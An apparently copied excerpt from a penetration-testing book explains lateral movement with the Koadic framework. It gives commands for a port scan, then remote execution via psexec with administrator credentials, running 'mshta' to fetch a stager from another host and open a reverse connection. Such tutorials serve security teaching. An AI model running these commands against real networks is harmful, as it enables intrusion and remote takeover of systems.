官术网_书友最值得收藏!

Pivoting

We now have access to the 192.168.10.171 system and using the credentials of this system, we can move around in the network and try to access another system that is in the same network. However, for this to work, we need to know the services running on the system. For this, we can use the tcp scanner implant for port scanning, which can be done by running the following commands:

use implant/scan/tcp 
info 
set rports 135,139,445 
set rhosts 192.168.10.130 
set zombie 0

The implant is ready to roll! Now we just need to run it:

run  

The mentioned ports are open, which means we can access the Remote Procedure Call (RPC) server on port 445 of this system. The main idea here is to access the RPC server to execute remote commands to execute our given stager command, which will get us the reverse connection over MSHTA. For this, we can use the exec_psexec implant and set the cmd to
mshta http://192.168.10.122:9999/fGLYN, which will execute our stager command on the given internal system:

use implant/pivot/exec_psexec 
info 
set cmd "mshta http://192.168.10.122:9999/fGLYN"

We also need to give the credentials for it:

set smbuser administrator 
set smbpass 123456 
set zombie 1 

The implant is ready to run, so let's run it:

Run 

As you can see from the preceding output, when we run the implant, it executed our given CMD to get hooked up by our stager.

Checking on all the zombies, we can see clearly that we now have access to 192.168.10.130 as well:

Using Koadic can be chaotic, depending upon the imagination of the user.

主站蜘蛛池模板: 汉源县| 根河市| 大埔区| 丰宁| 安丘市| 鹤山市| 马尔康县| 沈阳市| 乐业县| 中阳县| 日喀则市| 金昌市| 定安县| 南昌市| 东平县| 平山县| 慈利县| 嘉定区| 太谷县| 故城县| 合水县| 吉木萨尔县| 商洛市| 同德县| 阳信县| 静乐县| 彭州市| 江口县| 泸定县| 鹤壁市| 龙游县| 慈利县| 梅州市| 张家川| 敦煌市| 南城县| 靖江市| 灵山县| 获嘉县| 湖北省| 河间市|